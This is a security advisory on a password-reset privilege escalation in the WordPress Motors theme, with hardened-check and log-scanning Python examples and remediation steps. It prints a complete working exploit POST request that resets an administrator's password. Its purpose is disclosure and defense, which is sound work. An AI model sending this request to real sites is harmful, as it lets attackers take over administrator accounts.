A critical privilege escalation vulnerability (CVE-2025-4322) in the WordPress Motors theme is being actively exploited to take full control of WordPress sites. Discovered in early May 2025, this flaw allows an unauthenticated attacker to change the password of any user—including an administrator—without any prior authorization.

Context

Developed by StylemixThemes, the Motors theme is used by over 22,000 WordPress websites, primarily in the automotive sector. It includes advanced modules for account management, form handling, and classified ad search functionalities.

The vulnerable component is located in the “Login Register” widget, which is enabled on many websites through pages such as /reset-password, /account, or /signin.

Vulnerability Details

The flaw stems from improper verification of the user's identity during the password reset process. Because the hash_check field is insufficiently sanitized, an attacker can supply invalid UTF-8 characters in it to bypass the theme's hash verification logic.

Once the check is bypassed, the attacker submits an stm_new_password field in the POST body together with a user_id parameter pointing to an administrator account. The password is reset directly, with no email validation and no secure token.

Example of a malicious POST request

POST /index.php/login-register/?user_id=3&hash_check=%80 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
 
stm_new_password=Testtest123%21%40%23

Result: the attacker can immediately log in using the newly defined password.
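For contrast with the behaviour described above, the following is an added illustration (not the Motors theme's code, nor StylemixThemes' fix) of how a reset handler can validate the presented hash_check value so that a malformed token such as %80 is rejected before any comparison, and so that a missing stored token, an expired token, a replayed token or a mismatching user_id all fail closed. The in-memory ResetStore, the 15-minute lifetime and the 64-hex-character token format are assumptions made for the example; the query strings it parses follow the request shown above.

```python
"""Hardened password-reset token check (added illustration, not the theme's code).

Shows the checks a reset handler should apply so that a malformed hash_check
value (e.g. the invalid UTF-8 byte 0x80 from the request above) is rejected
outright rather than reaching the comparison against stored data.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional
from urllib.parse import unquote_to_bytes

TOKEN_TTL_SECONDS = 15 * 60   # assumption: 15-minute reset window


@dataclass
class ResetToken:
    user_id: int
    token_hash: str     # SHA-256 hex of the e-mailed token; plaintext is never stored
    expires_at: float   # epoch seconds
    used: bool = False


class ResetStore:
    """In-memory stand-in for a table of pending reset tokens (assumption)."""

    def __init__(self) -> None:
        self._pending: Dict[int, ResetToken] = {}

    def issue(self, user_id: int, now: float) -> str:
        token = secrets.token_hex(32)   # 64 lowercase hex chars, delivered out of band
        self._pending[user_id] = ResetToken(
            user_id, hashlib.sha256(token.encode()).hexdigest(), now + TOKEN_TTL_SECONDS
        )
        return token

    def lookup(self, user_id: int) -> Optional[ResetToken]:
        return self._pending.get(user_id)


def raw_query_param(query: str, name: str) -> Optional[bytes]:
    """Percent-decode a query parameter to raw bytes without forcing a charset,
    so invalid UTF-8 is visible to the caller instead of being silently replaced."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_to_bytes(value)
    return None


def authorize_reset(store: ResetStore, query: str, now: float) -> str:
    """Return "authorized" only when every check passes, else "rejected".

    Nothing about the stored token is consulted until the presented values
    have passed strict syntactic validation.
    """
    uid_raw = raw_query_param(query, "user_id")
    tok_raw = raw_query_param(query, "hash_check")
    if uid_raw is None or tok_raw is None or not uid_raw.isdigit():
        return "rejected"
    user_id = int(uid_raw)

    # The token must decode as UTF-8 and be exactly 64 hex characters.
    # %80 is not valid UTF-8 and fails here, before any comparison happens.
    try:
        token = tok_raw.decode("utf-8")
    except UnicodeDecodeError:
        return "rejected"
    if len(token) != 64 or any(c not in "0123456789abcdef" for c in token):
        return "rejected"

    # A missing, expired or already-used record is a rejection, never an
    # "empty equals empty" match.
    rec = store.lookup(user_id)
    if rec is None or rec.used or now > rec.expires_at:
        return "rejected"

    # Constant-time comparison of the hash of the presented token.
    presented_hash = hashlib.sha256(token.encode()).hexdigest()
    if not hmac.compare_digest(rec.token_hash, presented_hash):
        return "rejected"

    rec.used = True   # single use: replaying the same token is rejected
    return "authorized"


if __name__ == "__main__":
    store = ResetStore()
    t = store.issue(3, now=1_000.0)
    print(authorize_reset(store, "user_id=3&hash_check=%80", now=1_000.0))   # rejected
    print(authorize_reset(store, f"user_id=3&hash_check={t}", now=1_000.0))  # authorized
    print(authorize_reset(store, f"user_id=3&hash_check={t}", now=1_000.0))  # rejected (replay)
```

The ordering matters: syntactic validation of the presented value comes first, a lookup failure is treated as a failure rather than a pass-through, the comparison is constant-time, and the token is consumed on success so it cannot be replayed.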

Indicators of Compromise (IOC)

Signs of exploitation of this vulnerability:

  • Inability for administrators to log in (invalid password)
  • Appearance of new administrator accounts in the back office
  • Suspicious logins from malicious IP addresses
  • Modified PHP files or unusual behavior in the dashboard

Remediation Measures

  • Immediately update the Motors theme to version 5.6.68 or higher
  • Reset all user passwords
  • Delete all unknown or recently created accounts
  • Implement multi-factor authentication (MFA)
  • Search the logs for abnormal POST requests to /reset-password or /login-register
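To support the last step, here is an added example (not part of the original bulletin) that scans web-server access logs for POST requests to the /login-register and /reset-password paths, and raises the severity when user_id and hash_check are passed in the query string of a POST and when the hash_check value does not decode as valid UTF-8, which is the pattern in the request shown earlier. It assumes the Apache/nginx "combined" log format; the sample lines are constructed (RFC 5737 documentation addresses, invented timestamps) and are not real traffic.

```python
"""Scan access logs for the POST pattern described in the advisory.

Added illustration, not part of the original bulletin. Assumes Apache/nginx
"combined" log format and uses constructed sample lines; adapt LOG_RE and
WATCHED_PATHS to the site's real log format and permalink structure.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_to_bytes, urlsplit

# Paths the advisory names as hosting the Login Register widget / reset flow.
WATCHED_PATHS = ("/login-register", "/reset-password")

# Combined format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (documentation IP ranges; not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2025:10:15:32 +0000] "POST /index.php/login-register/?user_id=3&hash_check=%80 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '198.51.100.4 - - [12/May/2025:10:16:01 +0000] "GET /account/ HTTP/1.1" 200 8800 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/May/2025:10:17:45 +0000] "POST /reset-password/ HTTP/1.1" 302 0 "https://example.test/reset-password/" "Mozilla/5.0"',
    '203.0.113.7 - - [12/May/2025:10:18:02 +0000] "POST /index.php/login-register/?user_id=1&hash_check=%c3%a9 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]


def query_params_bytes(query: str) -> Dict[str, bytes]:
    """Percent-decode query values to raw bytes so invalid UTF-8 stays observable."""
    params: Dict[str, bytes] = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[key] = unquote_to_bytes(value)
    return params


def is_valid_utf8(data: bytes) -> bool:
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for a POST to a watched path, or None for anything else."""
    m = LOG_RE.match(line)
    if m is None or m["method"] != "POST":
        return None
    parts = urlsplit(m["target"])
    path = parts.path.rstrip("/")
    if not any(path.endswith(p) for p in WATCHED_PATHS):
        return None

    params = query_params_bytes(parts.query)
    reasons = ["POST to a login-register/reset-password path"]
    severity = "review"          # ordinary form submissions also land here
    if "user_id" in params and "hash_check" in params:
        reasons.append("user_id and hash_check passed in the query string of a POST")
        severity = "medium"
        if not is_valid_utf8(params["hash_check"]):
            reasons.append("hash_check is not valid UTF-8")
            severity = "high"

    return {
        "ip": m["ip"], "ts": m["ts"], "status": m["status"],
        "path": parts.path, "severity": severity, "reasons": reasons,
    }


def scan(lines: List[str]) -> List[dict]:
    return [f for f in (analyze_line(ln) for ln in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["severity"].upper(), finding["ip"], finding["ts"], finding["path"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Lines rated "review" are ordinary POSTs to the reset or login-register pages and need correlating with expected reset traffic; "high" findings should be cross-checked against the other indicators listed above (failed administrator logins, new administrator accounts, modified PHP files) for the same period.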